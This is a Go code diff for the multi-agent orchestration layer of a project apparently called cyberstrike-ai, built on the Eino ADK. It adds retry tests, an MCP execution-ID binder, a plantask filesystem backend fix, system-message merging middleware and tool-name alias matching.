func einoMessagesForRunRestart(args *einoADKRunLoopArgs, baseMsgs, accumulated []adk.Message, baseCount int) ([]adk.Message, einoRunRestartContextSource) { func einoMessagesForRunRestart(args *einoADKRunLoopArgs, baseMsgs, accumulated []adk.Message, baseCount int) ([]adk.Message, einoRunRestartContextSource) {
if trace := persistTraceSource(args, nil); len(trace) > 0 { if trace := persistTraceSource(args, nil); len(trace) > 0 {
return append([]adk.Message(nil), trace...), einoRestartContextModelTrace // modelFacingTrace includes prior Instruction system message(s); genModelInput will prepend again.
return stripADKSystemMessages(trace), einoRestartContextModelTrace
} }
if len(accumulated) > baseCount { if len(accumulated) > baseCount {
return append([]adk.Message(nil), accumulated...), einoRestartContextAccumulated return stripADKSystemMessages(accumulated), einoRestartContextAccumulated
} }
return append([]adk.Message(nil), baseMsgs...), einoRestartContextInitial return append([]adk.Message(nil), baseMsgs...), einoRestartContextInitial
} }
@@ -27,6 +27,7 @@ func TestIsEinoTransientRunError(t *testing.T) {
{"429", errors.New("HTTP 429 Too Many Requests"), true}, {"429", errors.New("HTTP 429 Too Many Requests"), true},
{"rate limit", errors.New(`{"error":"rate limit exceeded"}`), true}, {"rate limit", errors.New(`{"error":"rate limit exceeded"}`), true},
{"connection reset", errors.New("read tcp: connection reset by peer"), true}, {"connection reset", errors.New("read tcp: connection reset by peer"), true},
{"http2 goaway", errors.New("failed to receive stream chunk: error, http2: server sent GOAWAY and closed the connection; LastStreamID=791, ErrCode=NO_ERROR"), true},
{"unexpected eof", errors.New("unexpected EOF"), true}, {"unexpected eof", errors.New("unexpected EOF"), true},
{"503", errors.New("upstream returned 503"), true}, {"503", errors.New("upstream returned 503"), true},
{"iteration limit", errors.New("max iteration reached"), false}, {"iteration limit", errors.New("max iteration reached"), false},
@@ -90,6 +91,20 @@ func TestEinoRunRetryMaxAttemptsFromArgs(t *testing.T) {
} }
} }
func TestEinoTransientRunRetrierReset(t *testing.T) {
t.Parallel()
r := newEinoTransientRunRetrier(einoTransientRunRetryPolicy{maxAttempts: 10, maxBackoff: 30 * time.Second})
r.attempts = 3
r.reset()
if r.attempt() != 0 {
t.Fatalf("after reset: attempt=%d, want 0", r.attempt())
}
// 重置后下一次退避应从 2s 起算(attempt index 0)。
if got := einoTransientRetryBackoff(r.attempt(), r.policy.maxBackoff); got != 2*time.Second {
t.Fatalf("backoff after reset: got %v, want 2s", got)
}
}
func TestAppendUserMessageIfNeeded(t *testing.T) { func TestAppendUserMessageIfNeeded(t *testing.T) {
t.Parallel() t.Parallel()
msgs := []adk.Message{schema.UserMessage("old task")} msgs := []adk.Message{schema.UserMessage("old task")}
@@ -102,10 +117,3 @@ func TestAppendUserMessageIfNeeded(t *testing.T) {
t.Fatalf("should not duplicate user message: len=%d", len(dup)) t.Fatalf("should not duplicate user message: len=%d", len(dup))
} }
} }
func TestErrTransientRetryContinue(t *testing.T) {
t.Parallel()
if !errors.Is(ErrTransientRetryContinue, ErrTransientRetryContinue) {
t.Fatal("sentinel should match")
}
}
-4
View File
@@ -5,7 +5,3 @@ import "errors"
// ErrInterruptContinue 作为 context.CancelCause 使用:用户选择「中断并继续」且当前无进行中的 MCP 工具时, // ErrInterruptContinue 作为 context.CancelCause 使用:用户选择「中断并继续」且当前无进行中的 MCP 工具时,
// 取消当前推理/流式输出,并在同一会话任务内携带用户补充说明自动续跑下一轮(类似 Hermes 式人机回合)。 // 取消当前推理/流式输出,并在同一会话任务内携带用户补充说明自动续跑下一轮(类似 Hermes 式人机回合)。
var ErrInterruptContinue = errors.New("agent interrupt: continue with user-supplied context") var ErrInterruptContinue = errors.New("agent interrupt: continue with user-supplied context")
// ErrTransientRetryContinue 表示 Run 因 429/网络等临时错误结束,应由 handler 落库轨迹后
// loadHistoryFromAgentTrace 再开下一轮 Run(与 ErrInterruptContinue 同级的「分段续跑」语义)。
var ErrTransientRetryContinue = errors.New("agent transient: retry after persisting trace")
@@ -0,0 +1,31 @@
package multiagent
import "strings"
// MCPExecutionBinder maps ADK toolCallID → MCP monitor execution ID for a single agent run.
type MCPExecutionBinder struct {
byToolCall map[string]string
}
func NewMCPExecutionBinder() *MCPExecutionBinder {
return &MCPExecutionBinder{byToolCall: make(map[string]string)}
}
func (b *MCPExecutionBinder) Bind(toolCallID, executionID string) {
if b == nil {
return
}
tid := strings.TrimSpace(toolCallID)
eid := strings.TrimSpace(executionID)
if tid == "" || eid == "" {
return
}
b.byToolCall[tid] = eid
}
func (b *MCPExecutionBinder) ExecutionID(toolCallID string) string {
if b == nil {
return ""
}
return b.byToolCall[strings.TrimSpace(toolCallID)]
}
@@ -0,0 +1,14 @@
package multiagent
import "testing"
func TestMCPExecutionBinder(t *testing.T) {
b := NewMCPExecutionBinder()
b.Bind("call-1", "exec-1")
if got := b.ExecutionID("call-1"); got != "exec-1" {
t.Fatalf("expected exec-1, got %q", got)
}
if got := b.ExecutionID("missing"); got != "" {
t.Fatalf("expected empty, got %q", got)
}
}
@@ -27,7 +27,7 @@ import (
// 本中间件与之互补,专职兜底正向孤儿。 // 本中间件与之互补,专职兜底正向孤儿。
// - 仅剔除消息,不向历史里注入虚构 assistant(tc):虚构 tool_calls 反而会误导模型后续推理。 // - 仅剔除消息,不向历史里注入虚构 assistant(tc):虚构 tool_calls 反而会误导模型后续推理。
// 摘要已覆盖被裁剪段的语义,丢一条原始 tool 结果对对话连贯性影响最小。 // 摘要已覆盖被裁剪段的语义,丢一条原始 tool 结果对对话连贯性影响最小。
// - 位置建议:挂在所有可能改写历史的中间件(summarization / reduction / skill / plantask / // - 位置建议:挂在 summarization / reduction / skill / plantask / system 合并 / 续聊 dedup 之后,
// tool_search)之后,靠近 ChatModel 调用的那一端。 // tool_search)之后,靠近 ChatModel 调用的那一端。
type orphanToolPrunerMiddleware struct { type orphanToolPrunerMiddleware struct {
adk.BaseChatModelAgentMiddleware adk.BaseChatModelAgentMiddleware
@@ -0,0 +1,71 @@
package multiagent
import (
"context"
"fmt"
"os"
"path/filepath"
"strings"
localbk "github.com/cloudwego/eino-ext/adk/backend/local"
"github.com/cloudwego/eino/adk/middlewares/plantask"
)
// localPlantaskBackend adapts eino-ext local filesystem backend for Eino plantask.
//
// plantask TaskCreate/TaskList list a directory via LsInfo, then Read using each entry's Path.
// local.LsInfo returns basenames only (e.g. ".highwatermark"), while local.Read expects a
// resolvable path — causing "file not found: .highwatermark" on the second TaskCreate.
type localPlantaskBackend struct {
*localbk.Local
}
func newLocalPlantaskBackend(loc *localbk.Local) *localPlantaskBackend {
if loc == nil {
return nil
}
return &localPlantaskBackend{Local: loc}
}
// LsInfo lists files under req.Path and returns absolute paths suitable for subsequent Read calls.
func (l *localPlantaskBackend) LsInfo(ctx context.Context, req *plantask.LsInfoRequest) ([]plantask.FileInfo, error) {
if l == nil || l.Local == nil {
return nil, fmt.Errorf("plantask backend: local nil")
}
if req == nil || strings.TrimSpace(req.Path) == "" {
return nil, fmt.Errorf("plantask backend: list path empty")
}
files, err := l.Local.LsInfo(ctx, req)
if err != nil {
return nil, err
}
if len(files) == 0 {
return files, nil
}
base := filepath.Clean(req.Path)
out := make([]plantask.FileInfo, len(files))
for i, f := range files {
out[i] = f
name := strings.TrimSpace(f.Path)
if name == "" {
continue
}
if filepath.IsAbs(name) {
out[i].Path = filepath.Clean(name)
continue
}
out[i].Path = filepath.Join(base, name)
}
return out, nil
}
func (l *localPlantaskBackend) Delete(ctx context.Context, req *plantask.DeleteRequest) error {
if l == nil || l.Local == nil || req == nil {
return nil
}
p := strings.TrimSpace(req.FilePath)
if p == "" {
return nil
}
return os.Remove(p)
}
@@ -0,0 +1,83 @@
package multiagent
import (
"context"
"os"
"path/filepath"
"testing"
localbk "github.com/cloudwego/eino-ext/adk/backend/local"
"github.com/cloudwego/eino/adk/filesystem"
"github.com/cloudwego/eino/adk/middlewares/plantask"
)
func TestLocalPlantaskBackendLsInfoReturnsFullPaths(t *testing.T) {
t.Parallel()
ctx := context.Background()
baseDir := t.TempDir()
loc, err := localbk.NewBackend(ctx, &localbk.Config{})
if err != nil {
t.Fatalf("NewBackend: %v", err)
}
be := newLocalPlantaskBackend(loc)
hwPath := filepath.Join(baseDir, ".highwatermark")
if err := os.WriteFile(hwPath, []byte("1"), 0o600); err != nil {
t.Fatalf("write highwatermark: %v", err)
}
files, err := be.LsInfo(ctx, &plantask.LsInfoRequest{Path: baseDir})
if err != nil {
t.Fatalf("LsInfo: %v", err)
}
if len(files) != 1 {
t.Fatalf("expected 1 file, got %d", len(files))
}
if files[0].Path != hwPath {
t.Fatalf("expected full path %q, got %q", hwPath, files[0].Path)
}
content, err := be.Read(ctx, &plantask.ReadRequest{FilePath: files[0].Path})
if err != nil {
t.Fatalf("Read via LsInfo path: %v", err)
}
if content.Content != "1" {
t.Fatalf("unexpected content: %q", content.Content)
}
}
func TestLocalPlantaskBackendSecondTaskCreateScenario(t *testing.T) {
t.Parallel()
ctx := context.Background()
baseDir := t.TempDir()
loc, err := localbk.NewBackend(ctx, &localbk.Config{})
if err != nil {
t.Fatalf("NewBackend: %v", err)
}
be := newLocalPlantaskBackend(loc)
hwPath := filepath.Join(baseDir, ".highwatermark")
if err := loc.Write(ctx, &filesystem.WriteRequest{FilePath: hwPath, Content: "1"}); err != nil {
t.Fatalf("seed highwatermark: %v", err)
}
files, err := be.LsInfo(ctx, &plantask.LsInfoRequest{Path: baseDir})
if err != nil {
t.Fatalf("LsInfo: %v", err)
}
var hwFile string
for _, f := range files {
if filepath.Base(f.Path) == ".highwatermark" {
hwFile = f.Path
break
}
}
if hwFile == "" {
t.Fatal("highwatermark not listed")
}
if _, err := be.Read(ctx, &plantask.ReadRequest{FilePath: hwFile}); err != nil {
t.Fatalf("Read highwatermark (second TaskCreate path): %v", err)
}
}
+50 -61
View File
@@ -15,6 +15,7 @@ import (
"cyberstrike-ai/internal/agent" "cyberstrike-ai/internal/agent"
"cyberstrike-ai/internal/agents" "cyberstrike-ai/internal/agents"
"cyberstrike-ai/internal/config" "cyberstrike-ai/internal/config"
"cyberstrike-ai/internal/database"
"cyberstrike-ai/internal/einomcp" "cyberstrike-ai/internal/einomcp"
"cyberstrike-ai/internal/openai" "cyberstrike-ai/internal/openai"
"cyberstrike-ai/internal/project" "cyberstrike-ai/internal/project"
@@ -56,8 +57,10 @@ func RunDeepAgent(
appCfg *config.Config, appCfg *config.Config,
ma *config.MultiAgentConfig, ma *config.MultiAgentConfig,
ag *agent.Agent, ag *agent.Agent,
db *database.DB,
logger *zap.Logger, logger *zap.Logger,
conversationID string, conversationID string,
projectID string,
userMessage string, userMessage string,
history []agent.ChatMessage, history []agent.ChatMessage,
roleTools []string, roleTools []string,
@@ -107,10 +110,12 @@ func RunDeepAgent(
var mcpIDsMu sync.Mutex var mcpIDsMu sync.Mutex
var mcpIDs []string var mcpIDs []string
recorder := func(id string) { mcpExecBinder := NewMCPExecutionBinder()
recorder := func(id, toolCallID string) {
if id == "" { if id == "" {
return return
} }
mcpExecBinder.Bind(toolCallID, id)
mcpIDsMu.Lock() mcpIDsMu.Lock()
mcpIDs = append(mcpIDs, id) mcpIDs = append(mcpIDs, id)
mcpIDsMu.Unlock() mcpIDsMu.Unlock()
@@ -128,21 +133,6 @@ func RunDeepAgent(
toolInvokeNotify := einomcp.NewToolInvokeNotifyHolder() toolInvokeNotify := einomcp.NewToolInvokeNotifyHolder()
mainDefs := ag.ToolsForRole(roleTools) mainDefs := ag.ToolsForRole(roleTools)
toolOutputChunk := func(toolName, toolCallID, chunk string) {
// When toolCallId is missing, frontend ignores tool_result_delta.
if progress == nil || toolCallID == "" {
return
}
progress("tool_result_delta", chunk, map[string]interface{}{
"toolName": toolName,
"toolCallId": toolCallID,
// index/total/iteration are optional for UI; we don't know them in this bridge.
"index": 0,
"total": 0,
"iteration": 0,
"source": "eino",
})
}
httpClient := &http.Client{ httpClient := &http.Client{
Timeout: 30 * time.Minute, Timeout: 30 * time.Minute,
@@ -210,19 +200,19 @@ func RunDeepAgent(
} }
subDefs := ag.ToolsForRole(roleTools) subDefs := ag.ToolsForRole(roleTools)
subTools, err := einomcp.ToolsFromDefinitions(ag, holder, subDefs, recorder, toolOutputChunk, toolInvokeNotify, id) subTools, err := einomcp.ToolsFromDefinitions(ag, holder, subDefs, recorder, nil, toolInvokeNotify, id)
if err != nil { if err != nil {
return nil, fmt.Errorf("子代理 %q 工具: %w", id, err) return nil, fmt.Errorf("子代理 %q 工具: %w", id, err)
} }
subToolsForCfg, subPre, subToolSearchActive, err := prependEinoMiddlewares(ctx, &ma.EinoMiddleware, einoMWSub, subTools, einoLoc, skillsRoot, conversationID, logger) subToolsForCfg, subPre, subToolSearchActive, err := prependEinoMiddlewares(ctx, &ma.EinoMiddleware, einoMWSub, subTools, einoLoc, skillsRoot, conversationID, projectID, logger)
if err != nil { if err != nil {
return nil, fmt.Errorf("子代理 %q eino 中间件: %w", id, err) return nil, fmt.Errorf("子代理 %q eino 中间件: %w", id, err)
} }
subMax := resolveMaxIterations(appCfg, sub.MaxIterations) subMax := resolveMaxIterations(appCfg, sub.MaxIterations)
subSumMw, err := newEinoSummarizationMiddleware(ctx, subModel, appCfg, &ma.EinoMiddleware, conversationID, logger) subSumMw, err := newEinoSummarizationMiddleware(ctx, subModel, appCfg, &ma.EinoMiddleware, conversationID, db, projectID, logger)
if err != nil { if err != nil {
return nil, fmt.Errorf("子代理 %q summarization 中间件: %w", id, err) return nil, fmt.Errorf("子代理 %q summarization 中间件: %w", id, err)
} }
@@ -233,7 +223,7 @@ func RunDeepAgent(
} }
if einoSkillMW != nil { if einoSkillMW != nil {
if einoFSTools && einoLoc != nil { if einoFSTools && einoLoc != nil {
subFs, fsErr := subAgentFilesystemMiddleware(ctx, einoLoc, toolInvokeNotify, id, einoExecMonitor, agentToolTimeoutMinutes(appCfg), toolOutputChunk) subFs, fsErr := subAgentFilesystemMiddleware(ctx, einoLoc, toolInvokeNotify, id, einoExecMonitor, agentToolTimeoutMinutes(appCfg), nil)
if fsErr != nil { if fsErr != nil {
return nil, fmt.Errorf("子代理 %q filesystem 中间件: %w", id, fsErr) return nil, fmt.Errorf("子代理 %q filesystem 中间件: %w", id, fsErr)
} }
@@ -241,13 +231,13 @@ func RunDeepAgent(
} }
subHandlers = append(subHandlers, einoSkillMW) subHandlers = append(subHandlers, einoSkillMW)
} }
subHandlers = append(subHandlers, subSumMw) subHandlers = appendEinoChatModelTailMiddlewares(subHandlers, einoChatModelTailConfig{
// 孤儿 tool 消息兜底:放在 summarization 之后,telemetry 之前, logger: logger,
// 以便 telemetry 记录的 token 数与 LLM 实际入参一致。 phase: "sub_agent:" + id,
subHandlers = append(subHandlers, newOrphanToolPrunerMiddleware(logger, "sub_agent:"+id)) summarization: subSumMw,
if teleMw := newEinoModelInputTelemetryMiddleware(logger, appCfg.OpenAI.Model, conversationID, "sub_agent"); teleMw != nil { modelName: appCfg.OpenAI.Model,
subHandlers = append(subHandlers, teleMw) conversationID: conversationID,
} })
subInstrFinal := project.AppendVisionImageAnalysisIfReady(instr, appCfg.Vision.Ready()) subInstrFinal := project.AppendVisionImageAnalysisIfReady(instr, appCfg.Vision.Ready())
subInstrFinal = injectToolNamesOnlyInstruction(ctx, subInstrFinal, subTools, subToolSearchActive) subInstrFinal = injectToolNamesOnlyInstruction(ctx, subInstrFinal, subTools, subToolSearchActive)
@@ -293,7 +283,7 @@ func RunDeepAgent(
return nil, fmt.Errorf("多代理主模型: %w", err) return nil, fmt.Errorf("多代理主模型: %w", err)
} }
mainSumMw, err := newEinoSummarizationMiddleware(ctx, mainModel, appCfg, &ma.EinoMiddleware, conversationID, logger) mainSumMw, err := newEinoSummarizationMiddleware(ctx, mainModel, appCfg, &ma.EinoMiddleware, conversationID, db, projectID, logger)
if err != nil { if err != nil {
return nil, fmt.Errorf("多代理主 summarization 中间件: %w", err) return nil, fmt.Errorf("多代理主 summarization 中间件: %w", err)
} }
@@ -320,11 +310,11 @@ func RunDeepAgent(
} }
} }
mainTools, err := einomcp.ToolsFromDefinitions(ag, holder, mainDefs, recorder, toolOutputChunk, toolInvokeNotify, orchestratorName) mainTools, err := einomcp.ToolsFromDefinitions(ag, holder, mainDefs, recorder, nil, toolInvokeNotify, orchestratorName)
if err != nil { if err != nil {
return nil, err return nil, err
} }
mainToolsForCfg, mainOrchestratorPre, mainToolSearchActive, err := prependEinoMiddlewares(ctx, &ma.EinoMiddleware, einoMWMain, mainTools, einoLoc, skillsRoot, conversationID, logger) mainToolsForCfg, mainOrchestratorPre, mainToolSearchActive, err := prependEinoMiddlewares(ctx, &ma.EinoMiddleware, einoMWMain, mainTools, einoLoc, skillsRoot, conversationID, projectID, logger)
if err != nil { if err != nil {
return nil, err return nil, err
} }
@@ -371,7 +361,7 @@ func RunDeepAgent(
inner: einoLoc, inner: einoLoc,
invokeNotify: toolInvokeNotify, invokeNotify: toolInvokeNotify,
einoAgentName: orchestratorName, einoAgentName: orchestratorName,
outputChunk: toolOutputChunk, outputChunk: nil,
recordMonitor: einoExecMonitor, recordMonitor: einoExecMonitor,
toolTimeoutMinutes: agentToolTimeoutMinutes(appCfg), toolTimeoutMinutes: agentToolTimeoutMinutes(appCfg),
} }
@@ -389,14 +379,14 @@ func RunDeepAgent(
if einoSkillMW != nil { if einoSkillMW != nil {
deepHandlers = append(deepHandlers, einoSkillMW) deepHandlers = append(deepHandlers, einoSkillMW)
} }
deepHandlers = append(deepHandlers, mainSumMw) deepHandlers = appendEinoChatModelTailMiddlewares(deepHandlers, einoChatModelTailConfig{
deepHandlers = append(deepHandlers, newOrphanToolPrunerMiddleware(logger, "deep_orchestrator")) logger: logger,
if teleMw := newEinoModelInputTelemetryMiddleware(logger, appCfg.OpenAI.Model, conversationID, "deep_orchestrator"); teleMw != nil { phase: "deep_orchestrator",
deepHandlers = append(deepHandlers, teleMw) summarization: mainSumMw,
} modelName: appCfg.OpenAI.Model,
if capMw := newModelFacingTraceMiddleware(modelFacingTrace); capMw != nil { conversationID: conversationID,
deepHandlers = append(deepHandlers, capMw) trace: modelFacingTrace,
} })
supHandlers := []adk.ChatModelAgentMiddleware{} supHandlers := []adk.ChatModelAgentMiddleware{}
if len(mainOrchestratorPre) > 0 { if len(mainOrchestratorPre) > 0 {
@@ -405,14 +395,14 @@ func RunDeepAgent(
if einoSkillMW != nil { if einoSkillMW != nil {
supHandlers = append(supHandlers, einoSkillMW) supHandlers = append(supHandlers, einoSkillMW)
} }
supHandlers = append(supHandlers, mainSumMw) supHandlers = appendEinoChatModelTailMiddlewares(supHandlers, einoChatModelTailConfig{
supHandlers = append(supHandlers, newOrphanToolPrunerMiddleware(logger, "supervisor_orchestrator")) logger: logger,
if teleMw := newEinoModelInputTelemetryMiddleware(logger, appCfg.OpenAI.Model, conversationID, "supervisor_orchestrator"); teleMw != nil { phase: "supervisor_orchestrator",
supHandlers = append(supHandlers, teleMw) summarization: mainSumMw,
} modelName: appCfg.OpenAI.Model,
if capMw := newModelFacingTraceMiddleware(modelFacingTrace); capMw != nil { conversationID: conversationID,
supHandlers = append(supHandlers, capMw) trace: modelFacingTrace,
} })
mainToolsCfg := adk.ToolsConfig{ mainToolsCfg := adk.ToolsConfig{
ToolsNodeConfig: compose.ToolsNodeConfig{ ToolsNodeConfig: compose.ToolsNodeConfig{
@@ -426,7 +416,7 @@ func RunDeepAgent(
EmitInternalEvents: true, EmitInternalEvents: true,
} }
deepOutKey, modelRetry, taskGen := deepExtrasFromConfig(ma) deepOutKey, taskGen := deepExtrasFromConfig(ma)
var da adk.Agent var da adk.Agent
switch orchMode { switch orchMode {
@@ -438,7 +428,7 @@ func RunDeepAgent(
// 构建 filesystem 中间件(与 Deep sub-agent 一致) // 构建 filesystem 中间件(与 Deep sub-agent 一致)
var peFsMw adk.ChatModelAgentMiddleware var peFsMw adk.ChatModelAgentMiddleware
if einoSkillMW != nil && einoFSTools && einoLoc != nil { if einoSkillMW != nil && einoFSTools && einoLoc != nil {
peFsMw, err = subAgentFilesystemMiddleware(ctx, einoLoc, toolInvokeNotify, "executor", einoExecMonitor, agentToolTimeoutMinutes(appCfg), toolOutputChunk) peFsMw, err = subAgentFilesystemMiddleware(ctx, einoLoc, toolInvokeNotify, "executor", einoExecMonitor, agentToolTimeoutMinutes(appCfg), nil)
if err != nil { if err != nil {
return nil, fmt.Errorf("plan_execute filesystem 中间件: %w", err) return nil, fmt.Errorf("plan_execute filesystem 中间件: %w", err)
} }
@@ -453,18 +443,22 @@ func RunDeepAgent(
AppCfg: appCfg, AppCfg: appCfg,
MwCfg: &ma.EinoMiddleware, MwCfg: &ma.EinoMiddleware,
ConversationID: conversationID, ConversationID: conversationID,
DB: db,
ProjectID: projectID,
Logger: logger, Logger: logger,
ModelName: appCfg.OpenAI.Model, ModelName: appCfg.OpenAI.Model,
ExecPreMiddlewares: mainOrchestratorPre, ExecPreMiddlewares: mainOrchestratorPre,
SkillMiddleware: einoSkillMW, SkillMiddleware: einoSkillMW,
FilesystemMiddleware: peFsMw, FilesystemMiddleware: peFsMw,
ModelFacingTrace: modelFacingTrace, ModelFacingTrace: modelFacingTrace,
PlannerReplannerRewriteHandlers: []adk.ChatModelAgentMiddleware{ PlannerReplannerRewriteHandlers: appendEinoChatModelTailMiddlewares(nil, einoChatModelTailConfig{
mainSumMw, logger: logger,
// 孤儿 tool 消息兜底:必须挂在 summarization 之后、telemetry 之前。 phase: "plan_execute_planner_replanner",
newOrphanToolPrunerMiddleware(logger, "plan_execute_planner_replanner"), summarization: mainSumMw,
newEinoModelInputTelemetryMiddleware(logger, appCfg.OpenAI.Model, conversationID, "plan_execute_planner_replanner_rewrite"), modelName: appCfg.OpenAI.Model,
}, conversationID: conversationID,
skipTrace: true,
}),
}) })
if perr != nil { if perr != nil {
return nil, perr return nil, perr
@@ -481,9 +475,6 @@ func RunDeepAgent(
Handlers: supHandlers, Handlers: supHandlers,
Exit: &adk.ExitTool{}, Exit: &adk.ExitTool{},
} }
if modelRetry != nil {
supCfg.ModelRetryConfig = modelRetry
}
if deepOutKey != "" { if deepOutKey != "" {
supCfg.OutputKey = deepOutKey supCfg.OutputKey = deepOutKey
} }
@@ -517,9 +508,6 @@ func RunDeepAgent(
if deepOutKey != "" { if deepOutKey != "" {
dcfg.OutputKey = deepOutKey dcfg.OutputKey = deepOutKey
} }
if modelRetry != nil {
dcfg.ModelRetryConfig = modelRetry
}
if taskGen != nil { if taskGen != nil {
dcfg.TaskToolDescriptionGenerator = taskGen dcfg.TaskToolDescriptionGenerator = taskGen
} }
@@ -565,6 +553,7 @@ func RunDeepAgent(
McpIDs: &mcpIDs, McpIDs: &mcpIDs,
FilesystemMonitorAgent: ag, FilesystemMonitorAgent: ag,
FilesystemMonitorRecord: recorder, FilesystemMonitorRecord: recorder,
MCPExecutionBinder: mcpExecBinder,
ToolInvokeNotify: toolInvokeNotify, ToolInvokeNotify: toolInvokeNotify,
DA: da, DA: da,
ModelFacingTrace: modelFacingTrace, ModelFacingTrace: modelFacingTrace,
@@ -0,0 +1,86 @@
package multiagent
import (
"context"
"github.com/cloudwego/eino/adk"
"github.com/cloudwego/eino/schema"
"go.uber.org/zap"
)
// systemMessageNormalizerMiddleware merges duplicate role=system messages into a single
// leading system message before summarization and each ChatModel call.
type systemMessageNormalizerMiddleware struct {
adk.BaseChatModelAgentMiddleware
logger *zap.Logger
phase string
}
func newSystemMessageNormalizerMiddleware(logger *zap.Logger, phase string) adk.ChatModelAgentMiddleware {
return &systemMessageNormalizerMiddleware{logger: logger, phase: phase}
}
func (m *systemMessageNormalizerMiddleware) BeforeModelRewriteState(
ctx context.Context,
state *adk.ChatModelAgentState,
mc *adk.ModelContext,
) (context.Context, *adk.ChatModelAgentState, error) {
_ = mc
if m == nil || state == nil || len(state.Messages) == 0 {
return ctx, state, nil
}
before := countADKSystemMessages(state.Messages)
if before <= 1 {
return ctx, state, nil
}
normalized := normalizeSingleLeadingSystemMessage(state.Messages, "")
if len(normalized) == len(state.Messages) && countADKSystemMessages(normalized) >= before {
return ctx, state, nil
}
if m.logger != nil {
m.logger.Info("eino system messages merged",
zap.String("phase", m.phase),
zap.Int("system_before", before),
zap.Int("system_after", countADKSystemMessages(normalized)),
zap.Int("messages_before", len(state.Messages)),
zap.Int("messages_after", len(normalized)),
)
}
out := *state
out.Messages = normalized
return ctx, &out, nil
}
func countADKSystemMessages(msgs []adk.Message) int {
n := 0
for _, msg := range msgs {
if msg != nil && msg.Role == schema.System {
n++
}
}
return n
}
// stripADKSystemMessages removes all system messages. Use before runner.Run restart when
// genModelInput will prepend a fresh Instruction.
func stripADKSystemMessages(msgs []adk.Message) []adk.Message {
if len(msgs) == 0 {
return msgs
}
out := make([]adk.Message, 0, len(msgs))
for _, msg := range msgs {
if msg == nil || msg.Role == schema.System {
continue
}
out = append(out, msg)
}
return out
}
// mergeCollectedSystemMessages collapses multiple system messages into one (or none).
func mergeCollectedSystemMessages(systemMsgs []adk.Message) []adk.Message {
if len(systemMsgs) == 0 {
return nil
}
return normalizeSingleLeadingSystemMessage(systemMsgs, "")
}
@@ -0,0 +1,75 @@
package multiagent
import (
"context"
"testing"
"github.com/cloudwego/eino/adk"
"github.com/cloudwego/eino/schema"
)
func TestStripADKSystemMessages(t *testing.T) {
in := []adk.Message{
schema.SystemMessage("a"),
schema.UserMessage("u"),
schema.SystemMessage("b"),
schema.AssistantMessage("x", nil),
}
out := stripADKSystemMessages(in)
if len(out) != 2 {
t.Fatalf("got %d messages, want 2", len(out))
}
if out[0].Role != schema.User || out[1].Role != schema.Assistant {
t.Fatalf("unexpected roles: %s, %s", out[0].Role, out[1].Role)
}
}
func TestEinoMessagesForRunRestart_StripsSystemFromTrace(t *testing.T) {
holder := newModelFacingTraceHolder()
holder.storeFromState(&adk.ChatModelAgentState{Messages: []adk.Message{
schema.SystemMessage("sys-1"),
schema.SystemMessage("sys-2"),
schema.UserMessage("task"),
}})
msgs, src := einoMessagesForRunRestart(&einoADKRunLoopArgs{ModelFacingTrace: holder}, nil, nil, 0)
if src != einoRestartContextModelTrace {
t.Fatalf("source: got %q want model_trace", src)
}
if len(msgs) != 1 || msgs[0].Role != schema.User {
t.Fatalf("expected user-only restart msgs, got %+v", msgs)
}
}
func TestSystemMessageNormalizerMiddleware_MergesDuplicates(t *testing.T) {
mw := newSystemMessageNormalizerMiddleware(nil, "test")
state := &adk.ChatModelAgentState{Messages: []adk.Message{
schema.SystemMessage("a"),
schema.SystemMessage("b"),
schema.UserMessage("u"),
}}
_, out, err := mw.(*systemMessageNormalizerMiddleware).BeforeModelRewriteState(context.Background(), state, nil)
if err != nil {
t.Fatal(err)
}
if countADKSystemMessages(out.Messages) != 1 {
t.Fatalf("want 1 system, got %d", countADKSystemMessages(out.Messages))
}
if out.Messages[0].Content != "a\n\nb" {
t.Fatalf("merged content: %q", out.Messages[0].Content)
}
}
func TestSystemMessageNormalizerMiddleware_NoOpSingleSystem(t *testing.T) {
mw := newSystemMessageNormalizerMiddleware(nil, "test")
state := &adk.ChatModelAgentState{Messages: []adk.Message{
schema.SystemMessage("only"),
schema.UserMessage("u"),
}}
_, out, err := mw.(*systemMessageNormalizerMiddleware).BeforeModelRewriteState(context.Background(), state, nil)
if err != nil {
t.Fatal(err)
}
if out != state {
t.Fatalf("expected same state pointer for no-op")
}
}
@@ -0,0 +1,72 @@
package multiagent
import (
"strings"
)
// expandAlwaysVisibleNameSet 将配置中的常驻工具名展开为可匹配运行时工具名的集合。
// 支持:内置短名 read_file;外部 mcp::tool;运行时 mcp__toolOpenAI/Eino 命名)。
func expandAlwaysVisibleNameSet(names []string) map[string]struct{} {
set := make(map[string]struct{}, len(names)*3)
add := func(name string) {
n := strings.TrimSpace(strings.ToLower(name))
if n == "" {
return
}
set[n] = struct{}{}
}
for _, raw := range names {
n := strings.TrimSpace(strings.ToLower(raw))
if n == "" {
continue
}
add(n)
if mcp, tool, ok := strings.Cut(n, "::"); ok && mcp != "" && tool != "" {
// 外部工具用 mcp::tool 配置时只展开运行时 mcp__tool,避免短名误伤其它 MCP 同名工具。
add(mcp + "__" + tool)
continue
}
if idx := strings.LastIndex(n, "__"); idx > 0 {
mcp, tool := n[:idx], n[idx+2:]
if mcp != "" && tool != "" {
add(mcp + "::" + tool)
}
continue
}
}
return set
}
// toolMatchesAlwaysVisible 判断运行时工具名是否命中常驻白名单(含别名)。
func toolMatchesAlwaysVisible(runtimeName string, nameSet map[string]struct{}) bool {
if len(nameSet) == 0 {
return false
}
name := strings.TrimSpace(strings.ToLower(runtimeName))
if name == "" {
return false
}
if _, ok := nameSet[name]; ok {
return true
}
if mcp, tool, ok := strings.Cut(name, "::"); ok && mcp != "" && tool != "" {
if _, ok := nameSet[mcp+"__"+tool]; ok {
return true
}
if _, ok := nameSet[tool]; ok {
return true
}
}
if idx := strings.LastIndex(name, "__"); idx > 0 {
mcp, tool := name[:idx], name[idx+2:]
if mcp != "" && tool != "" {
if _, ok := nameSet[mcp+"::"+tool]; ok {
return true
}
if _, ok := nameSet[tool]; ok {
return true
}
}
}
return false
}
@@ -0,0 +1,32 @@
package multiagent
import "testing"
func TestToolMatchesAlwaysVisible_ExternalAliases(t *testing.T) {
t.Parallel()
set := expandAlwaysVisibleNameSet([]string{"zhidemai::discount_search", "read_file"})
cases := []struct {
runtime string
want bool
}{
{"zhidemai__discount_search", true},
{"zhidemai::discount_search", true},
{"read_file", true},
{"zhidemai__product_search_pro", false},
{"github__discount_search", false},
}
for _, tc := range cases {
if got := toolMatchesAlwaysVisible(tc.runtime, set); got != tc.want {
t.Fatalf("toolMatchesAlwaysVisible(%q) = %v, want %v", tc.runtime, got, tc.want)
}
}
}
func TestExpandAlwaysVisibleNameSet_LegacyShortName(t *testing.T) {
